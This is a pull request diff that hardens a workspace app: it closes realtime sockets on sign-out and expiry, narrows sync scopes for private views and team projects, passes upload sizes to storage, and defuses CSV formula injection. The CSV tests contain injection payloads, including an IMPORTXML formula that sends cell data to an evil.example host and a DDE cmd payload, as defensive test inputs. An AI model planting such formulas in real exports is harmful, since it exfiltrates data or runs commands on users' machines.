### PR TITLE
Close the six remaining security findings, plus the analytics view leak they exposed

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -94,6 +94,12 @@ domain verified in Resend, otherwise every send fails.
 - **Errors.** Throw typed domain errors from `@orbit/shared/errors`. Route handlers map them to responses. Never swallow an error silently.
 - **Server state.** TanStack Query for fetching, with optimistic mutations. The realtime stream invalidates and patches the cache; it never triggers a full refetch of a list the user is looking at.
 - **Realtime.** Every mutation writes to Postgres, bumps `sync_id`, and publishes a `SyncAction` to Redis. The realtime server fans it out to subscribed clients. Contract lives in `packages/shared/src/events`.
+  A scope decides who is delivered a row, so it has to match who may read it: a project and its milestones
+  carry the scopes of the teams that own them and fall back to the workspace scope only when the project
+  belongs to no team, and a private saved view carries its owner alone.
+- **Socket lifetime.** A socket never outlives its session. Signing out publishes a session revocation on
+  the control channel and the hub closes that connection, and the hub also sweeps the sessions behind every
+  open connection on an interval, so an expired or deleted session is dropped even when nothing announced it.
 - **Auth.** better-auth. Passkeys, Google, GitHub, magic link. Email and password is
   optional, off unless `ORBIT_PASSWORD_AUTH=true`, hashed with `@node-rs/argon2` (argon2id),
   rate limited, and never a replacement for the passwordless methods.
@@ -102,7 +108,8 @@ domain verified in Resend, otherwise every send fails.
   consent screen at `/oauth/authorize` where the user picks a workspace and re-verifies a passkey. The
   standalone MCP server validates the access token against the shared database (`verifyMcpAccessToken`)
   and returns a `WWW-Authenticate` challenge on `401`. A `mcp_grant` row binds a client and user to the
-  chosen workspace.
+  chosen workspace. The granted scopes decide the tool set: a read tool needs `orbit.read`, a write tool
+  needs `orbit.write`, and a token carrying neither is refused with a `403` before any tool is registered.
 - **Email domains.** `ALLOWED_EMAIL_DOMAINS` is a comma-separated allowlist enforced on invite
   creation and on user creation, so it covers every provider. Empty means no restriction. A
   workspace can narrow it further with its own `allowedEmailDomains`.

--- a/apps/realtime/tests/session-revocation.test.ts
+++ b/apps/realtime/tests/session-revocation.test.ts
@@ -56,6 +56,65 @@ async function announceRevocation(userId: string): Promise<void> {
   );
 }
 
+describe('a socket never outlives the session that opened it', () => {
+  async function sweepingServer(): Promise<RealtimeServer> {
+    return await createRealtimeServer({ redisUrl: redisUrl(), sessionSweepIntervalMs: 100 });
+  }
+
+  it('closes a socket whose session row was deleted with nothing to announce it', async () => {
+    const server = await sweepingServer();
+    try {
+      const member = await createMember({ organizationId, teamIds: [teamId] });
+      const client = await connectClient(server.port, member, organizationId);
+      await client.waitFor('ready');
+
+      await db.delete(schema.session).where(eq(schema.session.token, member.token));
+
+      expect(await client.waitForClose()).toBe(SESSION_REVOKED_CLOSE_CODE);
+      expect(server.stats().connections).toBe(0);
+    } finally {
+      await server.close();
+    }
+  });
+
+  it('closes a socket once its session has expired', async () => {
+    const server = await sweepingServer();
+    try {
+      const member = await createMember({ organizationId, teamIds: [teamId] });
+      const client = await connectClient(server.port, member, organizationId);
+      await client.waitFor('ready');
+
+      await db
+        .update(schema.session)
+        .set({ expiresAt: new Date(Date.now() - 1_000) })
+        .where(eq(schema.session.token, member.token));
+
+      expect(await client.waitForClose()).toBe(SESSION_REVOKED_CLOSE_CODE);
+      expect(server.stats().connections).toBe(0);
+    } finally {
+      await server.close();
+    }
+  });
+
+  it('leaves a live session connected while it sweeps', async () => {
+    const server = await sweepingServer();
+    try {
+      const member = await createMember({ organizationId, teamIds: [teamId] });
+      const client = await connectClient(server.port, member, organizationId);
+      await client.waitFor('ready');
+
+      await delay(400);
+
+      client.send({ type: 'ping' });
+      expect(await client.waitFor('pong')).toBeDefined();
+      expect(server.stats().connections).toBe(1);
+      client.close();
+    } finally {
+      await server.close();
+    }
+  });
+});
+
 describe('session revocation', () => {
   it('closes the socket whose session row was deleted', async () => {
     const member = await createMember({ organizationId, teamIds: [teamId] });

--- a/apps/web/src/app/api/account/avatar/presign/route.ts
+++ b/apps/web/src/app/api/account/avatar/presign/route.ts
@@ -6,9 +6,9 @@ import { handle, readJson } from '@/lib/api/handler.ts';
 export async function POST(request: Request): Promise<Response> {
   const body = await readJson(request);
   return await handle(async (principal) => {
-    const { contentType } = avatarUploadSchema.parse(body);
+    const { contentType, size } = avatarUploadSchema.parse(body);
     const key = avatarStorageKey(principal.userId);
-    const target = await storageDriver().createUploadTarget(key, contentType);
+    const target = await storageDriver().createUploadTarget(key, contentType, size);
     return { upload: target };
   });
 }

--- a/apps/web/src/app/api/attachments/presign/route.ts
+++ b/apps/web/src/app/api/attachments/presign/route.ts
@@ -18,7 +18,7 @@ export async function POST(request: Request): Promise<Response> {
     await assertUploadParent(db, principal, parsed.parentType, parsed.parentId);
 
     const key = storageKeyFor(principal.organizationId, upload.safeName);
-    const target = await storageDriver().createUploadTarget(key, upload.contentType);
+    const target = await storageDriver().createUploadTarget(key, upload.contentType, upload.size);
 
     const syncId = await nextSyncId(db);
     const [created] = await db

--- a/apps/web/src/app/api/auth/[...all]/route.ts
+++ b/apps/web/src/app/api/auth/[...all]/route.ts
@@ -1,4 +1,11 @@
 import { toNextJsHandler } from 'better-auth/next-js';
 import { auth } from '@/lib/auth/server.ts';
+import { withSocketRevocation } from '@/lib/auth/sign-out.ts';
 
-export const { GET, POST } = toNextJsHandler(auth.handler);
+const handlers = toNextJsHandler(auth.handler);
+
+export const GET = handlers.GET;
+
+export function POST(request: Request): Promise<Response> {
+  return withSocketRevocation(request, handlers.POST);
+}

--- a/apps/web/src/features/analytics/csv.ts
+++ b/apps/web/src/features/analytics/csv.ts
@@ -1,7 +1,15 @@
+const FORMULA_LEAD = /^[=+@\t\r-]/;
+const NEEDS_QUOTES = /[",\n\r]/;
+
+function quoted(text: string): string {
+  return `"${text.replace(/"/g, '""')}"`;
+}
+
 export function csvCell(value: string | number): string {
-  const text = String(value);
-  if (/[",\n\r]/.test(text)) return `"${text.replace(/"/g, '""')}"`;
-  return text;
+  if (typeof value === 'number') return String(value);
+  if (FORMULA_LEAD.test(value)) return quoted(`'${value}`);
+  if (NEEDS_QUOTES.test(value)) return quoted(value);
+  return value;
 }
 
 export function toCsv(rows: ReadonlyArray<ReadonlyArray<string | number>>): string {

--- a/apps/web/src/lib/auth/sign-out.ts
+++ b/apps/web/src/lib/auth/sign-out.ts
@@ -1,0 +1,27 @@
+import { publishSessionRevoked } from '@orbit/core';
+import { auth } from './server.ts';
+
+const SIGN_OUT_PATH = '/api/auth/sign-out';
+
+export function isSignOutRequest(request: Request): boolean {
+  if (request.method.toUpperCase() !== 'POST') return false;
+  try {
+    return new URL(request.url).pathname.replace(/\/+$/, '').endsWith(SIGN_OUT_PATH);
+  } catch {
+    return false;
+  }
+}
+
+export async function withSocketRevocation(
+  request: Request,
+  handle: (request: Request) => Promise<Response>,
+): Promise<Response> {
+  if (!isSignOutRequest(request)) return await handle(request);
+
+  const session = await auth.api.getSession({ headers: request.headers });
+  const response = await handle(request);
+  const userId = session?.user.id;
+  if (userId === undefined || !response.ok) return response;
+  await publishSessionRevoked(userId);
+  return response;
+}

--- a/apps/web/tests-preload.ts
+++ b/apps/web/tests-preload.ts
@@ -1,5 +1,12 @@
 import { afterEach, expect, mock } from 'bun:test';
 import { GlobalRegistrator } from '@happy-dom/global-registrator';
+import { ensureLaneDatabase } from '@orbit/db/test-lane';
+import { resolveTestDatabaseUrl } from '../../scripts/test-env.ts';
+
+const databaseUrl = resolveTestDatabaseUrl('orbit_test_web');
+await ensureLaneDatabase(databaseUrl, 'orbit_test_web');
+process.env['DATABASE_URL'] = databaseUrl;
+process.env['DATABASE_POOL_MAX'] = '2';
 
 GlobalRegistrator.register({ url: 'http://localhost:3000' });
 

--- a/apps/web/tests/app/api/standup-board.test.ts
+++ b/apps/web/tests/app/api/standup-board.test.ts
@@ -1,9 +1,10 @@
-import { afterAll, beforeEach, describe, expect, it, mock } from 'bun:test';
+import { afterAll, beforeAll, beforeEach, describe, expect, it, mock } from 'bun:test';
+import { randomUUID } from 'node:crypto';
+import { db, eq, schema } from '@orbit/db';
 import type { Principal } from '@orbit/shared/policy';
 import { z } from 'zod';
 
 const coreModule = await import('@orbit/core');
-const dbModule = await import('@orbit/db');
 
 interface BoardStub {
   since: Date;
@@ -14,7 +15,6 @@ interface BoardStub {
 const SINCE = new Date('2030-06-10T08:00:00.000Z');
 
 const board: BoardStub = { since: SINCE, issues: [], workload: [] };
-const labelLinks: { issueId: string; labelId: string }[] = [];
 const received: unknown[] = [];
 
 mock.module('@orbit/core', () => ({
@@ -25,10 +25,80 @@ mock.module('@orbit/core', () => ({
   },
 }));
 
-mock.module('@orbit/db', () => ({
-  ...dbModule,
-  db: { select: () => ({ from: () => ({ where: () => Promise.resolve(labelLinks) }) }) },
-}));
+const seeded = {
+  organizationId: `org_${randomUUID()}`,
+  userId: `user_${randomUUID()}`,
+  teamId: `team_${randomUUID()}`,
+  stateId: `state_${randomUUID()}`,
+  labelledIssueId: `issue_${randomUUID()}`,
+  plainIssueId: `issue_${randomUUID()}`,
+  bugLabelId: `label_${randomUUID()}`,
+  uiLabelId: `label_${randomUUID()}`,
+};
+
+async function seedIssuesWithLabels(): Promise<void> {
+  await db.insert(schema.organization).values({
+    id: seeded.organizationId,
+    name: 'Standup board',
+    slug: seeded.organizationId,
+  });
+  await db.insert(schema.user).values({
+    id: seeded.userId,
+    name: 'Board Author',
+    email: `${seeded.userId}@orbit.test`,
+    handle: seeded.userId,
+  });
+  await db.insert(schema.team).values({
+    id: seeded.teamId,
+    organizationId: seeded.organizationId,
+    name: 'Board',
+    key: seeded.teamId.slice(5, 10).toUpperCase(),
+  });
+  await db.insert(schema.workflowState).values({
+    id: seeded.stateId,
+    organizationId: seeded.organizationId,
+    teamId: seeded.teamId,
+    name: 'Todo',
+    category: 'unstarted',
+    color: '#5A63C8',
+  });
+  await db.insert(schema.issue).values([
+    {
+      id: seeded.labelledIssueId,
+      organizationId: seeded.organizationId,
+      teamId: seeded.teamId,
+      number: 1,
+      identifier: `BRD-${seeded.labelledIssueId.slice(6, 12)}`,
+      title: 'Ship the importer',
+      stateId: seeded.stateId,
+      creatorId: seeded.userId,
+    },
+    {
+      id: seeded.plainIssueId,
+      organizationId: seeded.organizationId,
+      teamId: seeded.teamId,
+      number: 2,
+      identifier: `BRD-${seeded.plainIssueId.slice(6, 12)}`,
+      title: 'Fix the socket',
+      stateId: seeded.stateId,
+      creatorId: seeded.userId,
+    },
+  ]);
+  await db.insert(schema.label).values([
+    {
+      id: seeded.bugLabelId,
+      organizationId: seeded.organizationId,
+      name: `Bug ${seeded.bugLabelId.slice(6, 12)}`,
+      color: '#E5484D',
+    },
+    {
+      id: seeded.uiLabelId,
+      organizationId: seeded.organizationId,
+      name: `Ui ${seeded.uiLabelId.slice(6, 12)}`,
+      color: '#3E63DD',
+    },
+  ]);
+}
 
 const session = {
   user: { id: 'user_1', name: 'Ada Admin', email: 'ada@orbit.test' },
@@ -77,21 +147,26 @@ const errorSchema = z.object({ error: z.object({ code: z.string() }) });
 
 const BASE = 'http://localhost:3000/api/standup/board';
 
-beforeEach(() => {
+beforeAll(async () => {
+  await seedIssuesWithLabels();
+});
+
+beforeEach(async () => {
   sessionHolder.value = session;
   board.since = SINCE;
   board.issues = [
-    { id: 'issue_1', title: 'Ship the importer', assigneeId: 'user_2' },
-    { id: 'issue_2', title: 'Fix the socket', assigneeId: 'user_2' },
+    { id: seeded.labelledIssueId, title: 'Ship the importer', assigneeId: 'user_2' },
+    { id: seeded.plainIssueId, title: 'Fix the socket', assigneeId: 'user_2' },
   ];
   board.workload = [{ userId: 'user_2', open: 2, inProgress: 1, completedSince: 3 }];
-  labelLinks.length = 0;
+  await db.delete(schema.issueLabel).where(eq(schema.issueLabel.issueId, seeded.labelledIssueId));
   received.length = 0;
 });
 
-afterAll(() => {
-  mock.module('@orbit/db', () => dbModule);
+afterAll(async () => {
   mock.module('@orbit/core', () => coreModule);
+  await db.delete(schema.organization).where(eq(schema.organization.id, seeded.organizationId));
+  await db.delete(schema.user).where(eq(schema.user.id, seeded.userId));
 });
 
 describe('GET /api/standup/board', () => {
@@ -104,22 +179,35 @@ describe('GET /api/standup/board', () => {
     expect(response.status).toBe(200);
     expect(received).toEqual([{ since: SINCE.toISOString(), limitPerPerson: 5 }]);
     expect(payload.since).toBe(SINCE.toISOString());
-    expect(payload.issues.map((issue) => issue.id)).toEqual(['issue_1', 'issue_2']);
+    expect(payload.issues.map((issue) => issue.id)).toEqual([
+      seeded.labelledIssueId,
+      seeded.plainIssueId,
+    ]);
     expect(payload.workload).toEqual([
       { userId: 'user_2', open: 2, inProgress: 1, completedSince: 3 },
     ]);
   });
 
   it('attaches the labels of every issue it returns', async () => {
-    labelLinks.push(
-      { issueId: 'issue_1', labelId: 'label_bug' },
-      { issueId: 'issue_1', labelId: 'label_ui' },
-    );
+    await db.insert(schema.issueLabel).values([
+      {
+        id: `issue_label_${randomUUID()}`,
+        issueId: seeded.labelledIssueId,
+        labelId: seeded.bugLabelId,
+      },
+      {
+        id: `issue_label_${randomUUID()}`,
+        issueId: seeded.labelledIssueId,
+        labelId: seeded.uiLabelId,
+      },
+    ]);
 
     const response = await GET(new Request(BASE));
     const payload = payloadSchema.parse(await response.json());
 
-    expect(payload.issues[0]?.labelIds).toEqual(['label_bug', 'label_ui']);
+    expect([...(payload.issues[0]?.labelIds ?? [])].sort()).toEqual(
+      [seeded.bugLabelId, seeded.uiLabelId].sort(),
+    );
     expect(payload.issues[1]?.labelIds).toEqual([]);
   });
 

--- a/apps/web/tests/features/analytics/csv.test.ts
+++ b/apps/web/tests/features/analytics/csv.test.ts
@@ -12,6 +12,32 @@ describe('csvCell', () => {
     expect(csvCell('say "hi"')).toBe('"say ""hi"""');
     expect(csvCell('line\nbreak')).toBe('"line\nbreak"');
   });
+
+  it('defuses every leading character a spreadsheet reads as a formula', () => {
+    expect(csvCell('=1+1')).toBe(`"'=1+1"`);
+    expect(csvCell('+1+1')).toBe(`"'+1+1"`);
+    expect(csvCell('-1+1')).toBe(`"'-1+1"`);
+    expect(csvCell('@SUM(A1:A9)')).toBe(`"'@SUM(A1:A9)"`);
+    expect(csvCell('\t=1+1')).toBe(`"'\t=1+1"`);
+    expect(csvCell('\r=1+1')).toBe(`"'\r=1+1"`);
+  });
+
+  it('escapes the quotes inside a defused formula so the cell stays one cell', () => {
+    expect(csvCell('=HYPERLINK("http://evil.example","click")')).toBe(
+      `"'=HYPERLINK(""http://evil.example"",""click"")"`,
+    );
+    expect(csvCell("=cmd|' /C calc'!A0, now")).toBe(`"'=cmd|' /C calc'!A0, now"`);
+  });
+
+  it('keeps a negative measure a number, not quoted text', () => {
+    expect(csvCell(-5)).toBe('-5');
+    expect(csvCell(-0.5)).toBe('-0.5');
+  });
+
+  it('leaves a formula character that is not leading alone', () => {
+    expect(csvCell('Q1 = growth')).toBe('Q1 = growth');
+    expect(csvCell('a-b')).toBe('a-b');
+  });
 });
 
 describe('toCsv', () => {
@@ -22,5 +48,17 @@ describe('toCsv', () => {
       ['Doe, Jane', 1, 2],
     ]);
     expect(csv).toBe('Name,Completed,Total\r\nAda Admin,3,5\r\n"Doe, Jane",1,2');
+  });
+
+  it('ships a crafted issue title as inert text', () => {
+    const csv = toCsv([
+      ['Name', 'Total'],
+      ['=IMPORTXML(CONCAT("http://evil.example?x=",A1),"//a")', 1],
+    ]);
+
+    const cell = csv.split('\r\n')[1]?.split(',')[0] ?? '';
+    expect(cell.startsWith(`"'=`)).toBe(true);
+    expect(csv).not.toContain('\r\n=');
+    expect(csv).not.toContain(',=IMPORT');
   });
 });

--- a/apps/web/tests/lib/api/bootstrap.test.ts
+++ b/apps/web/tests/lib/api/bootstrap.test.ts
@@ -1,13 +1,6 @@
-import { describe, expect, it, mock } from 'bun:test';
+import { describe, expect, it } from 'bun:test';
 import type { Principal } from '@orbit/shared/policy';
-
-const dbModule = await import('@orbit/db');
-mock.module('@orbit/db', () => ({
-  ...dbModule,
-  db: { execute: () => Promise.resolve([{ version: '5' }]) },
-}));
-
-const { bootstrapVersion } = await import('../../../src/lib/api/bootstrap.ts');
+import { bootstrapVersion } from '../../../src/lib/api/bootstrap.ts';
 
 function member(userId: string, organizationId = 'org_shared'): Principal {
   return { userId, organizationId, role: 'admin', teamIds: ['team_1'] };

--- a/apps/web/tests/lib/auth/server-session-domain.test.ts
+++ b/apps/web/tests/lib/auth/server-session-domain.test.ts
@@ -1,33 +1,25 @@
-import { afterAll, beforeEach, describe, expect, it, mock } from 'bun:test';
+import { afterAll, beforeEach, describe, expect, it } from 'bun:test';
+import { randomUUID } from 'node:crypto';
+import { db, schema } from '@orbit/db';
 import { auth } from '../../../src/lib/auth/server.ts';
-
-const dbModule = await import('@orbit/db');
-let lookupEmail: string | undefined;
-
-mock.module('@orbit/db', () => ({
-  ...dbModule,
-  db: {
-    select: () => ({
-      from: () => ({
-        where: () => ({
-          limit: () => Promise.resolve(lookupEmail === undefined ? [] : [{ email: lookupEmail }]),
-        }),
-      }),
-    }),
-  },
-}));
 
 const previousDomains = process.env['ALLOWED_EMAIL_DOMAINS'];
 
 beforeEach(() => {
   process.env['ALLOWED_EMAIL_DOMAINS'] = 'magicapi.com,noveum.ai';
-  lookupEmail = undefined;
 });
 
 afterAll(() => {
   process.env['ALLOWED_EMAIL_DOMAINS'] = previousDomains ?? '';
-  mock.module('@orbit/db', () => dbModule);
 });
+
+async function userWith(email: string): Promise<string> {
+  const id = `user_${randomUUID()}`;
+  await db
+    .insert(schema.user)
+    .values({ id, name: 'Session Domain', email, handle: id, emailVerified: true });
+  return id;
+}
 
 function sessionHook() {
   const before = auth.options.databaseHooks?.session?.create?.before;
@@ -47,11 +39,11 @@ function sessionHook() {
 
 describe('session domain allowlist', () => {
   it('rejects an existing user whose domain is not allowed on any sign in', async () => {
-    lookupEmail = 'kpulkit15234@gmail.com';
+    const userId = await userWith(`kpulkit${randomUUID().slice(0, 8)}@gmail.com`);
 
     let thrown: unknown;
     try {
-      await sessionHook()('user_1');
+      await sessionHook()(userId);
     } catch (error) {
       thrown = error;
     }
@@ -59,13 +51,12 @@ describe('session domain allowlist', () => {
   });
 
   it('lets an allowed domain start a session', async () => {
-    lookupEmail = 'shashank@magicapi.com';
-    const result = await sessionHook()('user_1');
-    expect(result).toMatchObject({ data: { userId: 'user_1' } });
+    const userId = await userWith(`shashank${randomUUID().slice(0, 8)}@magicapi.com`);
+    const result = await sessionHook()(userId);
+    expect(result).toMatchObject({ data: { userId } });
   });
 
   it('does nothing when the user cannot be found', async () => {
-    lookupEmail = undefined;
     const result = await sessionHook()('ghost');
     expect(result).toMatchObject({ data: { userId: 'ghost' } });
   });

--- a/apps/web/tests/lib/auth/sign-out.test.ts
+++ b/apps/web/tests/lib/auth/sign-out.test.ts
@@ -1,0 +1,191 @@
+import { afterAll, beforeAll, describe, expect, it } from 'bun:test';
+import { createHmac, randomUUID } from 'node:crypto';
+import { db, eq, schema } from '@orbit/db';
+import { createRealtimeHub, type RealtimeHub } from '@orbit/realtime-server';
+import { SESSION_REVOKED_CLOSE_CODE } from '@orbit/shared/events';
+import { REALTIME_TICKET_TTL_MS, signRealtimeTicket } from '@orbit/shared/events/ticket';
+import { POST as authPost } from '../../../src/app/api/auth/[...all]/route.ts';
+import { auth } from '../../../src/lib/auth/server.ts';
+
+const APP_ORIGIN = 'http://localhost:3001';
+
+class FakeSocket {
+  readyState = 1;
+  readonly sent: string[] = [];
+  closedWith: { code: number; reason: string } | undefined;
+
+  send(payload: string): void {
+    this.sent.push(payload);
+  }
+
+  bufferedAmount(): number {
+    return 0;
+  }
+
+  terminate(): void {
+    this.readyState = 3;
+  }
+
+  close(code: number, reason: string): void {
+    this.closedWith = { code, reason };
+    this.readyState = 3;
+  }
+
+  pings = 0;
+
+  ping(): void {
+    this.pings += 1;
+  }
+}
+
+let hub: RealtimeHub;
+let organizationId = '';
+
+beforeAll(async () => {
+  organizationId = `org_${randomUUID()}`;
+  await db
+    .insert(schema.organization)
+    .values({ id: organizationId, name: 'Sign out', slug: organizationId });
+  hub = await createRealtimeHub({
+    redisUrl: process.env['REDIS_URL'] ?? 'redis://localhost:6380',
+    ticketSecret: process.env['BETTER_AUTH_SECRET'] ?? '',
+  });
+});
+
+afterAll(async () => {
+  await hub.close();
+  await db.delete(schema.organization).where(eq(schema.organization.id, organizationId));
+});
+
+interface SignedIn {
+  readonly userId: string;
+  readonly sessionId: string;
+  readonly cookie: string;
+}
+
+async function signIn(existingUserId?: string): Promise<SignedIn> {
+  const context = await auth.$context;
+  const userId = existingUserId ?? `user_${randomUUID()}`;
+  const sessionId = `session_${randomUUID()}`;
+  const token = `token_${randomUUID()}`;
+  if (existingUserId === undefined) {
+    await db.insert(schema.user).values({
+      id: userId,
+      name: 'Sign Out',
+      email: `${userId}@orbit.test`,
+      handle: userId,
+      emailVerified: true,
+    });
+    await db
+      .insert(schema.member)
+      .values({ id: `member_${randomUUID()}`, organizationId, userId, role: 'member' });
+  }
+  await db.insert(schema.session).values({
+    id: sessionId,
+    token,
+    userId,
+    activeOrganizationId: organizationId,
+    expiresAt: new Date(Date.now() + 3_600_000),
+  });
+
+  const signature = createHmac('sha256', context.secret).update(token).digest('base64');
+  const value = encodeURIComponent(`${token}.${signature}`);
+  const cookie = `${context.authCookies.sessionToken.name}=${value}`;
+
+  const session = await auth.api.getSession({ headers: new Headers({ cookie }) });
+  if (session?.user.id !== userId) throw new Error('the seeded session cookie is not usable');
+
+  return { userId, sessionId, cookie };
+}
+
+async function openSocket(member: SignedIn): Promise<FakeSocket> {
+  const socket = new FakeSocket();
+  const session = hub.accept(socket);
+  session.message(
+    JSON.stringify({
+      type: 'auth',
+      ticket: signRealtimeTicket(
+        {
+          userId: member.userId,
+          organizationId,
+          sessionId: member.sessionId,
+          exp: Date.now() + REALTIME_TICKET_TTL_MS,
+        },
+        process.env['BETTER_AUTH_SECRET'] ?? '',
+      ),
+    }),
+  );
+  await settle(() => socket.sent.length > 0);
+  expect(socket.sent.map((raw) => JSON.parse(raw).type)).toContain('ready');
+  return socket;
+}
+
+async function settle(done: () => boolean, attempts = 60): Promise<void> {
+  for (let attempt = 0; attempt < attempts; attempt += 1) {
+    if (done()) return;
+    await new Promise((resolve) => setTimeout(resolve, 50));
+  }
+}
+
+async function sessionCount(userId: string): Promise<number> {
+  const rows = await db
+    .select({ id: schema.session.id })
+    .from(schema.session)
+    .where(eq(schema.session.userId, userId));
+  return rows.length;
+}
+
+function authRequest(path: string, cookie: string): Request {
+  const request = new Request(`${APP_ORIGIN}${path}`, {
+    method: 'POST',
+    headers: { 'content-type': 'application/json' },
+  });
+  request.headers.set('cookie', cookie);
+  return request;
+}
+
+function signOutRequest(cookie: string): Request {
+  return authRequest('/api/auth/sign-out', cookie);
+}
+
+describe('signing out closes the socket that session opened', () => {
+  it('drops the live connection as soon as the session row is deleted', async () => {
+    const member = await signIn();
+    const socket = await openSocket(member);
+    expect(await sessionCount(member.userId)).toBe(1);
+
+    const response = await authPost(signOutRequest(member.cookie));
+    expect(response.status).toBe(200);
+    expect(await sessionCount(member.userId)).toBe(0);
+
+    await settle(() => socket.closedWith !== undefined);
+    expect(socket.closedWith?.code).toBe(SESSION_REVOKED_CLOSE_CODE);
+    expect(hub.stats().connections).toBe(0);
+  });
+
+  it('leaves the sockets of everybody else alone', async () => {
+    const leaving = await signIn();
+    const staying = await signIn();
+    const leavingSocket = await openSocket(leaving);
+    const stayingSocket = await openSocket(staying);
+
+    await authPost(signOutRequest(leaving.cookie));
+
+    await settle(() => leavingSocket.closedWith !== undefined);
+    expect(leavingSocket.closedWith?.code).toBe(SESSION_REVOKED_CLOSE_CODE);
+    expect(stayingSocket.closedWith).toBeUndefined();
+    expect(await sessionCount(staying.userId)).toBe(1);
+  });
+
+  it('keeps a socket whose session survives a sign out on another device', async () => {
+    const member = await signIn();
+    const socket = await openSocket(member);
+    const otherDevice = await signIn(member.userId);
+
+    await authPost(signOutRequest(otherDevice.cookie));
+
+    await settle(() => socket.closedWith !== undefined, 10);
+    expect(socket.closedWith).toBeUndefined();
+    expect(await sessionCount(member.userId)).toBe(1);
+  });
+});

--- a/apps/web/tests/lib/auth/sign-out.test.ts
+++ b/apps/web/tests/lib/auth/sign-out.test.ts
@@ -1,6 +1,6 @@
 import { afterAll, beforeAll, describe, expect, it } from 'bun:test';
 import { createHmac, randomUUID } from 'node:crypto';
-import { db, eq, schema } from '@orbit/db';
+import { db, eq, inArray, schema } from '@orbit/db';
 import { createRealtimeHub, type RealtimeHub } from '@orbit/realtime-server';
 import { SESSION_REVOKED_CLOSE_CODE } from '@orbit/shared/events';
 import { REALTIME_TICKET_TTL_MS, signRealtimeTicket } from '@orbit/shared/events/ticket';
@@ -40,6 +40,7 @@ class FakeSocket {
 
 let hub: RealtimeHub;
 let organizationId = '';
+const seededUserIds: string[] = [];
 
 beforeAll(async () => {
   organizationId = `org_${randomUUID()}`;
@@ -55,6 +56,9 @@ beforeAll(async () => {
 afterAll(async () => {
   await hub.close();
   await db.delete(schema.organization).where(eq(schema.organization.id, organizationId));
+  if (seededUserIds.length > 0) {
+    await db.delete(schema.user).where(inArray(schema.user.id, seededUserIds));
+  }
 });
 
 interface SignedIn {
@@ -79,6 +83,7 @@ async function signIn(existingUserId?: string): Promise<SignedIn> {
     await db
       .insert(schema.member)
       .values({ id: `member_${randomUUID()}`, organizationId, userId, role: 'member' });
+    seededUserIds.push(userId);
   }
   await db.insert(schema.session).values({
     id: sessionId,

--- a/packages/core/src/analytics/saved-view.ts
+++ b/packages/core/src/analytics/saved-view.ts
@@ -54,7 +54,29 @@ export function toSavedAnalyticsViewPayload(row: SavedAnalyticsViewRow): SavedAn
 }
 
 function viewScopes(row: SavedAnalyticsViewRow): string[] {
+  if (!row.shared) return [scopes.user(row.ownerId)];
   return [scopes.organization(row.organizationId), scopes.user(row.ownerId)];
+}
+
+function unshareActions(
+  before: SavedAnalyticsViewRow,
+  after: SavedAnalyticsViewRow,
+  syncId: number,
+  actor: Awaited<ReturnType<typeof principalActor>>,
+): SyncAction[] {
+  if (!before.shared || after.shared) return [];
+  return [
+    buildSyncAction({
+      syncId,
+      organizationId: after.organizationId,
+      scopes: [scopes.organization(after.organizationId)],
+      action: 'delete',
+      model: 'view',
+      modelId: after.id,
+      data: { id: after.id },
+      actor,
+    }),
+  ];
 }
 
 export async function listSavedAnalyticsViews(
@@ -164,7 +186,7 @@ export async function updateSavedAnalyticsView(
 ): Promise<{ view: SavedAnalyticsViewRow; actions: SyncAction[] }> {
   assertCan(principal, 'view:manage');
   const parsed: SavedAnalyticsViewUpdate = savedAnalyticsViewUpdateSchema.parse(input);
-  await loadOwnedView(principal, id);
+  const existing = await loadOwnedView(principal, id);
 
   return await db.transaction(async (tx) => {
     const values: Partial<typeof schema.savedAnalyticsView.$inferInsert> = {
@@ -196,6 +218,7 @@ export async function updateSavedAnalyticsView(
           data: toSavedAnalyticsViewPayload(view),
           actor,
         }),
+        ...unshareActions(existing, view, syncId, actor),
       ],
     };
   });

--- a/packages/core/src/org/starter-content.ts
+++ b/packages/core/src/org/starter-content.ts
@@ -163,11 +163,7 @@ export async function seedStarterContent(
       buildSyncAction({
         syncId: params.syncId,
         organizationId: params.organizationId,
-        scopes: [
-          scopes.organization(params.organizationId),
-          scopes.team(params.team.id),
-          scopes.project(project.id),
-        ],
+        scopes: [scopes.team(params.team.id), scopes.project(project.id)],
         action: 'insert',
         model: 'project',
         modelId: project.id,

--- a/packages/core/src/test-support.ts
+++ b/packages/core/src/test-support.ts
@@ -1,5 +1,7 @@
 import { asc, db, eq, schema, sql } from '@orbit/db';
 import type { OrgRole } from '@orbit/shared/constants';
+import type { SyncAction } from '@orbit/shared/events';
+import { scopes } from '@orbit/shared/events';
 import type { Principal } from '@orbit/shared/policy';
 import { newId } from './internal.ts';
 import { resolvePrincipal } from './org/member-service.ts';
@@ -92,4 +94,18 @@ export function stateNamed(
   const found = workspace.states.find((state) => state.name === name);
   if (found === undefined) throw new Error(`No workflow state named ${name}.`);
   return found;
+}
+
+export function subscribedScopes(principal: Principal): string[] {
+  return [
+    scopes.organization(principal.organizationId),
+    ...principal.teamIds.map((teamId) => scopes.team(teamId)),
+    scopes.user(principal.userId),
+  ];
+}
+
+export function reaches(principal: Principal, action: SyncAction): boolean {
+  if (action.organizationId !== principal.organizationId) return false;
+  const listening = new Set(subscribedScopes(principal));
+  return action.scopes.some((scope) => listening.has(scope));
 }

--- a/packages/core/src/work/milestone-service.ts
+++ b/packages/core/src/work/milestone-service.ts
@@ -2,7 +2,6 @@ import { and, asc, db, desc, eq, schema } from '@orbit/db';
 import { SORT_ORDER_STEP } from '@orbit/shared/constants';
 import { conflict } from '@orbit/shared/errors';
 import type { SyncAction } from '@orbit/shared/events';
-import { scopes } from '@orbit/shared/events';
 import type { Principal } from '@orbit/shared/policy';
 import { assertCan } from '@orbit/shared/policy';
 import { milestoneCreateSchema, milestoneUpdateSchema } from '@orbit/shared/validators';
@@ -10,12 +9,16 @@ import { principalActor } from '../activity/activity-service.ts';
 import { type Executor, newId, requireRow, toDateString } from '../internal.ts';
 import { buildSyncAction } from '../realtime/publisher.ts';
 import { nextSyncId } from '../sync/sync-id.ts';
-import { assertProjectVisible } from './project-service.ts';
+import { assertProjectVisible, projectReachScopes, projectTeamIds } from './project-service.ts';
 
 export type MilestoneRow = typeof schema.milestone.$inferSelect;
 
-function milestoneScopes(row: MilestoneRow): string[] {
-  return [scopes.organization(row.organizationId), scopes.project(row.projectId)];
+async function milestoneScopes(executor: Executor, row: MilestoneRow): Promise<string[]> {
+  return projectReachScopes(
+    row.organizationId,
+    row.projectId,
+    await projectTeamIds(executor, row.projectId),
+  );
 }
 
 async function assertMilestoneReachable(
